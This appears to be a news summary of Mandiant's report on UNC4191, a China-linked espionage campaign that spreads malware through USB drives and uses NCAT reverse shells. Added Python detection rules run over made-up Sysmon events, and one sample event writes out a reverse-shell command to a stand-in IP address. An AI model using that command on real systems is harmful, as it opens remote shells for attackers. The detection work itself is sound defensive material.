Mandiant Managed Defense recently discovered a cyber espionage operation, tracked as UNC4191, that is focused primarily on the Philippines and uses USB devices to infect its victims. Mandiant links the operation to China.
UNC4191's operations have affected public and private sector organizations across Southeast Asia, Europe and the U.S., but they concentrate on the Philippines.
Multiple Malicious USB Devices Deliver Malware
Victims were first infected through USB devices. The threat actor then used legitimately signed binaries to sideload malware from three new malware families: MISTCLOAK, DARKDEW and BLUEHAZE.
According to Mandiant Managed Defense, a successful compromise resulted in the deployment and execution of a renamed NCAT binary on the victim's system, giving the threat actor backdoor access.
The malware can also spread by infecting removable drives connected to a compromised system. This carries the malware payloads to additional systems and potentially lets the threat actor gather information from those systems as well.
UNC4191 Malware Families
Mandiant identified the following malware families used by UNC4191. MISTCLOAK is a C++ launcher that executes an encrypted executable payload stored in a file on disk. DARKDEW is a C++ dropper that can infect removable drives.
BLUEHAZE is a C/C++ launcher that launches a copy of NCAT to create a reverse shell to the actor's command and control (C2) server.
NCAT is a legitimate command-line networking utility (the Nmap project's netcat replacement) that can be used to upload and download files. Threat actors also use it to create reverse shells and backdoors and to tunnel traffic in order to bypass network controls. Because the binary is signed and widely used, defenders should look at how it is named and invoked rather than at its presence alone.
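The two behaviours described above, a signed binary sideloading a malicious DLL and a renamed NCAT copy spawning a reverse shell, are straightforward to hunt for in endpoint telemetry. The following detection logic is an added example written for this article; it is not code from Mandiant or from the UNC4191 samples. It runs over constructed Sysmon-style process-create (EventID 1) and image-load (EventID 7) records, assumes the Ncat PE's version resource carries an OriginalFileName of ncat.exe, and treats any directory outside the Windows and Program Files trees as untrusted.

```python
"""Added example (not part of the original article or the Mandiant report):
detection rules for UNC4191-style tradecraft over constructed Sysmon-style events.

  * dll_sideload_untrusted_dir: a process in an untrusted directory (e.g. a
    removable drive) loads an unsigned DLL that sits beside it.
  * renamed_ncat / ncat_exec_shell / ncat_external_connect: the Ncat binary
    runs under a different on-disk name, hands its socket to a program, or
    connects to a non-RFC1918 address.

Field names follow Sysmon EventID 1 and EventID 7; the events are made up."""
import ipaddress
from typing import Dict, Iterable, List, Set

Event = Dict[str, object]

# Ncat flags that attach a program to the connection (reverse/bind shells).
NCAT_EXEC_FLAGS = {"-e", "--exec", "-c", "--sh-exec", "--lua-exec"}

# RFC 1918 and loopback ranges; anything else is treated as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Directories where a binary loading a DLL from its own folder is expected.
# Paths are normalised to forward slashes and lower case before comparison.
TRUSTED_DIR_PREFIXES = ("c:/windows/", "c:/program files/", "c:/program files (x86)/")


def _norm(path: str) -> str:
    # Windows paths may be analysed on a non-Windows host, so normalise separators.
    return path.replace("\\", "/").lower()


def _basename(path: str) -> str:
    return _norm(path).rsplit("/", 1)[-1]


def _dirname(path: str) -> str:
    return _norm(path).rsplit("/", 1)[0]


def _is_external(token: str) -> bool:
    try:
        addr = ipaddress.ip_address(token)
    except ValueError:
        return False  # not an IP literal; hostnames are not resolved offline
    return not any(addr in net for net in INTERNAL_NETS)


def check_process_create(ev: Event) -> List[Dict[str, str]]:
    findings: List[Dict[str, str]] = []
    image = str(ev.get("Image", ""))
    orig = str(ev.get("OriginalFileName", "")).lower()  # assumption: PE version resource
    is_ncat = orig == "ncat.exe" or _basename(image) == "ncat.exe"
    if orig == "ncat.exe" and _basename(image) != orig:
        findings.append({"rule": "renamed_ncat", "image": image})
    if is_ncat:
        tokens = str(ev.get("CommandLine", "")).split()  # sample lines carry no quoting
        if NCAT_EXEC_FLAGS.intersection(tokens):
            findings.append({"rule": "ncat_exec_shell", "image": image})
        if any(_is_external(t) for t in tokens):
            findings.append({"rule": "ncat_external_connect", "image": image})
    return findings


def check_image_load(ev: Event) -> List[Dict[str, str]]:
    image = str(ev.get("Image", ""))
    loaded = str(ev.get("ImageLoaded", ""))
    unsigned = str(ev.get("Signed", "")).lower() != "true"  # Sysmon: signature of the loaded image
    same_dir = _dirname(image) == _dirname(loaded)
    untrusted = not (_dirname(image) + "/").startswith(TRUSTED_DIR_PREFIXES)
    if unsigned and same_dir and untrusted and loaded.lower().endswith(".dll"):
        return [{"rule": "dll_sideload_untrusted_dir", "image": image, "dll": loaded}]
    return []


def analyze(events: Iterable[Event]) -> List[Dict[str, str]]:
    findings: List[Dict[str, str]] = []
    for ev in events:
        if ev.get("EventID") == 1:
            findings.extend(check_process_create(ev))
        elif ev.get("EventID") == 7:
            findings.extend(check_image_load(ev))
    return findings


def rules_fired(events: Iterable[Event]) -> Set[str]:
    return {f["rule"] for f in analyze(events)}


# Constructed sample telemetry (not real events).
BENIGN_EVENTS: List[Event] = [
    {"EventID": 1, "Image": r"C:\Program Files (x86)\Nmap\ncat.exe",
     "OriginalFileName": "ncat.exe", "CommandLine": "ncat.exe -zv 10.0.0.5 443"},
    {"EventID": 7, "Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\Windows\System32\ntdll.dll", "Signed": "true"},
]
MALICIOUS_EVENTS: List[Event] = [
    # Signed host binary on a USB stick loads an unsigned DLL dropped next to it.
    {"EventID": 7, "Image": r"E:\Update\update.exe",
     "ImageLoaded": r"E:\Update\version.dll", "Signed": "false"},
    # Renamed NCAT connecting out over TLS and handing the socket to cmd.exe.
    {"EventID": 1, "Image": r"C:\ProgramData\ms.exe", "OriginalFileName": "ncat.exe",
     "CommandLine": "ms.exe --ssl 203.0.113.10 443 -e cmd.exe"},
]

if __name__ == "__main__":
    for finding in analyze(BENIGN_EVENTS + MALICIOUS_EVENTS):
        print(finding)
```

The sideload rule deliberately keys on the process directory rather than on the DLL name, since the actor chooses which signed binary to abuse; in production you would tighten it with a known-good hash list and add the parent-process chain so a USB-resident launcher spawning the renamed NCAT is caught even when the command line is obfuscated.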
Mandiant assesses that the campaign aims to gain and maintain access to public and private sector organizations in order to collect information that supports China's political and economic objectives.
Within that footprint, the Philippines is the main target.